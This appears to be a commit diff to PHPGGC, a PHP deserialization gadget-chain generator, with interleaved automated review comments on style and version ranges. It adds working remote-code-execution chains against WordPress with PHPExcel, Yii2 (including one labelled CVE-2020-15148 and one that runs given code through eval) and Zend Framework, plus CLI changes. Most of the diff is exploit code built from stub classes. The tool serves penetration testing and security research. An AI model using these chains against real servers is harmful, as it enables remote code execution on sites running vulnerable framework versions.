42 public function __destruct() {
43 if (!is_null($this->fileHandle)) {
44 fclose($this->fileHandle); // Will only produce a warning
45 unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 $this->fileHandle = null;
48 }
49 */
50 }
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_CachedObjectStorage_DiscISAM(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php
33 class PHPExcel_CachedObjectStorage_DiscISAM {
34 private $_fileName = null;
35 private $_fileHandle = 42;
36
37 public function __construct($filePath) {
38 $this->_fileName = $filePath;
39 }
40
41 /*
42 public function __destruct() {
43 if (!is_null($this->_fileHandle)) {
44 fclose($this->_fileHandle); // Will only produce a warning
45 unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 $this->fileHandle = null;
48 }
49 */
50 }
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE5 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '1.8.2+ & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.2';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_Shared_XMLWriter(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php
33 class PHPExcel_Shared_XMLWriter {
34 private $tempFileName = '';
35
36 public function __construct($filePath) {
37 $this->tempFileName = $filePath;
38 }
39
40 /*
41 public function __destruct()
42 {
43 // Unlink temporary files
44 if ($this->tempFileName != '') {
45 @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 }
48 */
49 }
0 <?php
1
2 namespace GadgetChain\WordPress\PHPExcel;
3
4 class RCE6 extends \PHPGGC\GadgetChain\RCE\FunctionCall
5 {
6 public static $version = '<= 1.8.1 & WP < 5.5.2';
7 public static $vector = '__destruct';
8 public static $author = 'erwan_lr';
9 public static $information = 'Tested up to WP 5.0.11 and PHPExcel 1.8.1';
10
11 public function generate(array $parameters)
12 {
13 $function = $parameters['function'];
14 $parameter = $parameters['parameter'];
15
16 return new \PHPExcel_Shared_XMLWriter(
17 new \PHPExcel_RichText(
18 new \Requests_Utility_FilteredIterator([$parameter], $function)
19 )
20 );
21 }
22 }
0 <?php
1
2 require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php');
3
4 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/RichText.php
5 class PHPExcel_RichText {
6 private $_richTextElements;
7
8 public function __construct($richTextElements) {
9 $this->_richTextElements = $richTextElements;
10 }
11
12 /*
13 public function getPlainText() {
14 // Return value
15 $returnValue = '';
16
17 // Loop through all PHPExcel_RichText_ITextElement
18 foreach ($this->_richTextElements as $text) {
19 $returnValue .= $text->getText();
20 }
21
22 // Return
23 return $returnValue;
24 }
25
26 public function __toString() {
27 return $this->getPlainText();
28 }
29 */
30 }
31
32 # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php
33 class PHPExcel_Shared_XMLWriter {
34 private $_tempFileName = '';
35
36 public function __construct($filePath) {
37 $this->_tempFileName = $filePath;
38 }
39
40 /*
41 public function __destruct()
42 {
43 // Unlink temporary files
44 if ($this->_tempFileName != '') {
45 @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE
46 }
47 }
48 */
49 }
1111 [2] https://github.com/WordPress/WordPress/blob/643ec358a40faba739266f11c34990c142f02d98/wp-includes/functions.php#L1057
1212 */
1313
14 // WordPress - https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php
14 /*
15 * Issue was introduced in 4.6 via "HTTP API: Replace internals with Requests library"
16 * See https://github.com/WordPress/WordPress/blob/6fd8080e7ee7599b36d4528f72a8ced612130b8c/wp-includes/Requests/Utility/FilteredIterator.php
17 *
18 * On October 29th, 2020, WP 5.5.2 was relased, fixing the issue: https://www.wordfence.com/blog/2020/11/unpacking-the-wordpress-5-5-2-5-5-3-security-release/
19 *
20 * More details:
21 * Versions in 5.x branches have been fixed, at the exception of 5.0.x
22 * 4.x from 4.6 are still vulnerable.
23 *
24 * 5.5.x, fixed in 5.5.2
25 * 5.4.x, fixed in 5.4.3
26 * 5.3.x, fixed in 5.3.5
27 * 5.2.x, fixed in 5.2.8
28 * 5.1.x, fixed in 5.1.7
29 * 5.0.x still vulnerable (latest checked 5.0.11)
30 * 4.9.x still vulnerable (latest checked 4.9.16)
31 * 4.8.x still vulnerable (latest checked 4.8.15)
32 * 4.7.x still vulnerable (latest checked 4.7.19)
33 * 4.6.x still vulnerable (latest checked 4.6.20)
34 */
1535 class Requests_Utility_FilteredIterator extends ArrayIterator {
1636 protected $callback;
1737
11
22 namespace GadgetChain\Yii;
33
4 class RCE1 extends \PHPGGC\GadgetChain\RCE
4 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '1.1.20';
77 public static $vector = '__wakeup';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 As the payload uses file_get_contents("data://..."), allow_url_fopen
1111 must be ON.
1212 ';
0 <?php
1
2 namespace GadgetChain\Yii2;
3
4
5 // CVE-2020-15148
6 class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
7 {
8 public static $version = '<2.0.38';
9 public static $vector = '__destruct';
10 public static $author = 'russtone';
11 public static $information = 'Executes $function with $parameter using call_user_func.';
12
13 public function generate(array $parameters)
14 {
15 $function = $parameters['function'];
16 $parameter = $parameters['parameter'];
17
18 $cache = new \yii\caching\ArrayCache($function, $parameter);
19 $csb = new \yii\db\ColumnSchemaBuilder($cache);
20 $conn = new \yii\db\Connection($csb);
21 $query = new \yii\db\BatchQueryResult($conn);
22
23 return $query;
24 }
25 }
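Review bot: The `// CVE-2020-15148` comment on line 5 is the only place the advisory is recorded, and code comments are not part of what the tool shows for a chain; `$information` presumably is. Moving it there keeps the identifier visible to users, e.g. `public static $information = 'Executes $function with $parameter using call_user_func. See CVE-2020-15148.';`, and the Yii2/RCE2 chain added alongside, which targets the same `<2.0.38` range, could reference it the same way.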
0 <?php
1
2 namespace yii\db {
3 class ColumnSchemaBuilder {
4 protected $type = 'x';
5 public $categoryMap;
6
7 function __construct($categoryMap) {
8 $this->categoryMap = $categoryMap;
9 }
10 }
11
12 class Connection {
13 public $pdo = 1;
14
15 function __construct($dsn) {
16 $this->dsn = $dsn;
17 }
18 }
19
20 class BatchQueryResult {
21 private $_dataReader;
22
23 function __construct($dataReader) {
24 $this->_dataReader = $dataReader;
25 }
26 }
27 }
28
29 namespace yii\caching {
30 class ArrayCache {
31 public $serializer;
32 private $_cache;
33
34 function __construct($function, $parameter) {
35 $this->serializer = [1 => $function];
36 $this->_cache = ['x' => [$parameter, 0]];
37 }
38 }
39 }
0 <?php
1
2 namespace GadgetChain\Yii2;
3
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '<2.0.38';
7 public static $vector = '__destruct';
8 public static $author = 'RedTeam Pentesting GmbH';
9 public static $information = 'Executes given PHP code through eval().';
10 public static $parameters = [
11 'code'
12 ];
13
14 public function generate(array $parameters)
15 {
16 $code = $parameters['code'];
17
18 $expression = new \yii\caching\ExpressionDependency($code);
19 $callback = array($expression, 'evaluateDependency');
20 $dbsession = new \yii\web\DbSession($callback);
21 $query = new \yii\db\BatchQueryResult($dbsession);
22
23 return $query;
24 }
25 }
26
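Review bot: `public static $parameters = ['code'];` on lines 10-12 contradicts the cleanup this same commit performs on Symfony/RCE2 and Symfony/RCE3, where the identical declaration is deleted when those chains are rebased onto `\PHPGGC\GadgetChain\RCE\PHPCode`; ZendFramework/RCE4, also added here on the same base, declares no `$parameters` either, so the base class evidently supplies `code` and the lines should be removed. `$callback = array($expression, 'evaluateDependency');` on line 19 uses the long array syntax; `$callback = [$expression, 'evaluateDependency'];` matches the rest of the commit. The companion gadgets file ends with a `?>` tag that the commit removes elsewhere.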
0 <?php
1 namespace yii\web
2 {
3 class DbSession
4 {
5 public $writeCallback;
6
7 function __construct($writeCallback) {
8 $this->writeCallback = $writeCallback;
9 }
10 }
11 }
12
13 namespace yii\caching
14 {
15 class ExpressionDependency
16 {
17 public $expression;
18
19 function __construct($expression) {
20 $this->expression = $expression;
21 }
22 }
23 }
24
25 namespace yii\db {
26 class BatchQueryResult {
27 private $_dataReader;
28
29 function __construct($dataReader) {
30 $this->_dataReader = $dataReader;
31 }
32 }
33 }
34
35 ?>
33
44 // Original author: Stefan Esser (2010)
55 // https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf
6 class RCE1 extends \PHPGGC\GadgetChain\RCE
6 class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode
77 {
88 public static $version = '? <= 1.12.20';
99 public static $vector = '__destruct';
1010 public static $author = 'mpchadwick'; # GC Implementation
11 public static $informations = '
11 public static $information = '
1212 - Uses preg_replace e modifier which has no effect in PHP >= 7.0.0
1313 - Payload gets executed twice
1414 ';
15 public static $parameters = [
16 'code'
17 ];
1815
1916 public function generate(array $parameters)
2017 {
11
22 namespace GadgetChain\ZendFramework;
33
4 class RCE2 extends \PHPGGC\GadgetChain\RCE
4 class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '1.11.12 <= 1.12.20';
77 public static $vector = '__toString';
88 public static $author = 'cf';
9 public static $informations = '
9 public static $information = '
1010 Uses zf1/zend-form, which requires zf1/zend-cache.
1111 ';
1212
11
22 namespace GadgetChain\ZendFramework;
33
4 class RCE3 extends \PHPGGC\GadgetChain\RCE
4 class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
55 {
66 public static $version = '2.0.1 <= ?';
77 public static $vector = '__destruct';
0 <?php
1
2 namespace GadgetChain\ZendFramework;
3
4 class RCE4 extends \PHPGGC\GadgetChain\RCE\PHPCode
5 {
6 public static $version = '? <= 1.12.20';
7 public static $vector = '__destruct';
8 public static $author = 'ydyachenko';
9
10 public static $information = '
11 - Based on ZendFramework/RCE1
12 - Works on PHP >= 7.0.0
13 ';
14
15 public function generate(array $parameters)
16 {
17 return new \Zend_Log(
18 [new \Zend_Log_Writer_Mail(
19 [1],
20 [],
21 new \Zend_Mail,
22 new \Zend_Layout(
23 new \Zend_Filter_Inflector(),
24 true,
25 $parameters['code']
26 )
27 )]
28 );
29 }
30 }
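Review bot: The `$information` block states `Works on PHP >= 7.0.0` with no upper bound, yet the chain depends on `create_function` (the `Zend_Filter_Callback::$_callback = "create_function"` stub in the gadgets.php added alongside this file), which PHP deprecated in 7.2 and removed in 8.0, so the listing overstates where the chain applies. Consider `- Works on PHP >= 7.0.0 and < 8.0.0 (relies on create_function, removed in PHP 8)` so the version caveat is visible in `-i` output as it is for RCE1's preg_replace note. As a point of style, `new \Zend_Mail` is written without parentheses while the neighbouring `new \Zend_Filter_Inflector()` has them; pick one form for the file.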
0 <?php
1
2 class Zend_Log
3 {
4 protected $_writers;
5
6 function __construct($x)
7 {
8 $this->_writers = $x;
9 }
10 }
11
12 class Zend_Log_Writer_Mail
13 {
14 protected $_eventsToMail;
15 protected $_layoutEventsToMail;
16 protected $_mail;
17 protected $_layout;
18 protected $_subjectPrependText;
19
20 public function __construct(
21 $eventsToMail,
22 $layoutEventsToMail,
23 $mail,
24 $layout
25 ) {
26 $this->_eventsToMail = $eventsToMail;
27 $this->_layoutEventsToMail = $layoutEventsToMail;
28 $this->_mail = $mail;
29 $this->_layout = $layout;
30 $this->_subjectPrependText = null;
31 }
32 }
33
34 class Zend_Mail
35 {
36 }
37
38 class Zend_Layout
39 {
40 protected $_inflector;
41 protected $_inflectorEnabled;
42 protected $_layout;
43
44 public function __construct(
45 $inflector,
46 $inflectorEnabled,
47 $layout
48 ) {
49 $this->_inflector = $inflector;
50 $this->_inflectorEnabled = $inflectorEnabled;
51 $this->_layout = '){}' . $layout . '/*';
52 }
53 }
54
55 class Zend_Filter_Callback
56 {
57 protected $_callback = "create_function";
58 protected $_options = [""];
59 }
60
61 class Zend_Filter_Inflector
62 {
63 protected $_rules = [];
64
65 public function __construct()
66 {
67 $this->_rules['script'] = [new Zend_Filter_Callback()];
68 }
69 }
4545 $clean_string = '';
4646 for($i=0; $i < strlen($string); $i++)
4747 {
48 $letter = $string{$i};
48 $letter = $string[$i];
4949 $clean_string .= ctype_print($letter) && $letter != '\\' ?
5050 $letter :
5151 sprintf("\\%02x", ord($letter));
88 * With 's':
99 * O:3:"Abc":1:{s:1:"x";i:3;} -> O:3:"Abc":1:{s:+1:"x";i:3;}
1010 *
11 * Note: Since PHP 7.2, only i and d (float) types can have a +.
11 * Note: Since PHP 7.2, only i and d (float) types can be prefixed by
12 * a plus sign.
1213 */
1314 class PlusNumbers extends Enhancement
1415 {
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class Command
6 * Executes a command (bash/batch).
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class Command extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_COMMAND;
12 public static $parameters = [
13 'command'
14 ];
15 }
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class FunctionCall
6 * Executes a PHP function with one argument.
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class FunctionCall extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_FUNCTIONCALL;
12 public static $parameters = [
13 'function',
14 'parameter'
15 ];
16 }
0 <?php
1
2 namespace PHPGGC\GadgetChain\RCE;
3
4 /**
5 * Class PHPCode
6 * Executes PHP code.
7 * @package PHPGGC\GadgetChain\RCE
8 */
9 abstract class PHPCode extends \PHPGGC\GadgetChain\RCE
10 {
11 public static $type = self::TYPE_RCE_PHPCODE;
12 public static $parameters = [
13 'code'
14 ];
15 }
44 abstract class RCE extends \PHPGGC\GadgetChain
55 {
66 public static $type = self::TYPE_RCE;
7 public static $parameters = [
8 'function',
9 'parameter'
10 ];
7 # TBD by subclasses
8 public static $parameters = [];
119 }
0 <?php
1 namespace PHPGGC\GadgetChain;
2
3 abstract class SSRF extends \PHPGGC\GadgetChain
4 {
5 public static $type = self::TYPE_SSRF;
6 public static $parameters = [
7 'uri'
8 ];
9 }
10 ?>
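Review bot: SSRF.php ends with a `?>` closing tag on its last line and has no blank line after `<?php`, unlike the sibling Command.php, FunctionCall.php and PHPCode.php added in the same commit; a closing tag in a class-only file lets any trailing whitespace after it leak into output, so drop line 10 and match the sibling layout. It is also the only one of the four new abstract chain types without a class docblock; add one in the same shape as the others, e.g. `/** Class SSRF — performs a server-side request to the given 'uri' parameter. @package PHPGGC\GadgetChain */`.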
3737 public static $vector = '';
3838 public static $author = '';
3939 public static $parameters = [];
40 public static $informations;
40 public static $information;
4141
4242 # Types
43 const TYPE_RCE = 'rce';
44 const TYPE_FI = 'file_include';
45 const TYPE_FR = 'file_read';
46 const TYPE_FW = 'file_write';
47 const TYPE_FD = 'file_delete';
48 const TYPE_SQLI = 'sql_injection';
43 const TYPE_RCE = 'RCE';
44 const TYPE_RCE_FUNCTIONCALL = 'RCE (Function call)';
45 const TYPE_RCE_PHPCODE = 'RCE (PHP code)';
46 const TYPE_RCE_COMMAND = 'RCE (Command)';
47 const TYPE_CMD = 'CMD';
48 const TYPE_SSRF = 'SSRF';
49 const TYPE_FR = 'File read';
50 const TYPE_FW = 'File write';
51 const TYPE_FD = 'File delete';
52 const TYPE_SQLI = 'SQL injection';
4953 const TYPE_INFO = 'phpinfo()';
5054
5155 function __construct()
125129
126130 $strings = [];
127131
128 if(static::$informations)
132 if(static::$information)
129133 {
130 $informations = trim(static::$informations);
131 $informations = preg_replace("#\n\s+#", "\n", $informations);
132 $infos['Informations'] = "\n" . $informations;
134 $information = trim(static::$information);
135 $information = preg_replace("#\n\s+#", "\n", $information);
136 $infos['Informations'] = "\n" . $information;
133137 }
134138
135139 foreach($infos as $k => $v)
450450 /**
451451 * Displays a list of gadget chains.
452452 */
453 protected function list_gc()
453 protected function list_gc($filter)
454454 {
455455 $this->o("");
456456 $this->o("Gadget Chains");
467467 $data = [];
468468 foreach($this->chains as $chain)
469469 {
470 if($filter && stripos($chain::get_name(), $filter) === false)
471 continue;
470472 $data[] = [
471473 $chain::get_name(),
472474 $chain::$version,
473475 $chain::$type,
474476 $chain::$vector,
475 ($chain::$informations ? '*' : '')
477 ($chain::$information ? '*' : '')
476478 ];
477479 }
478480
499501
500502 $this->o('INFORMATION');
501503 $this->o(' -h, --help Displays help');
502 $this->o(' -l, --list Lists available gadget chains');
503 $this->o(' -i, --informations');
504 $this->o(' Displays informations about a gadget chain');
504 $this->o(' -l, --list [filter] Lists available gadget chains');
505 $this->o(' -i, --information');
506 $this->o(' Displays information about a gadget chain');
505507 $this->o('');
506508 $this->o('OUTPUT');
507509 $this->o(' -o, --output <file>');
554556 $this->o(' --test-payload');
555557 $this->o(' Instead of displaying or storing the payload, includes vendor/autoload.php and unserializes the payload.');
556558 $this->o(' The test script can only deserialize __destruct, __wakeup, __toString and PHAR payloads.');
557 $this->o(' Warning: This will run your payload on YOUR system !');
559 $this->o(' Warning: This will run the payload on YOUR system !');
558560 $this->o('');
559561
560562 $this->o('EXAMPLES');
563 $this->o(' ' . $this->_get_command_line(
564 '-l'
565 ));
566 $this->o(' ' . $this->_get_command_line(
567 '-l drupal'
568 ));
561569 $this->o(' ' . $this->_get_command_line(
562570 'Laravel/RCE1',
563571 'system',
614622
615623 foreach($valid_arguments as $k => $v)
616624 {
617 $abbreviations[$k] = $k{0};
625 $abbreviations[$k] = $k[0];
618626 }
619627
620628 $abbreviations = [
691699 break;
692700 }
693701 # This is a parameter or an option
694 if(strlen($arg) >= 2 && $arg{0} == '-')
702 if(strlen($arg) >= 2 && $arg[0] == '-')
695703 $this->_parse_cmdline_arg($i, $argv, $parameters, $options);
696704 # This is a value
697705 else
705713 switch($option)
706714 {
707715 case 'list':
708 $this->list_gc();
716 $this->list_gc(count($arguments) ? $arguments[0]: null);
709717 return;
710718 case 'help':
711719 $this->help();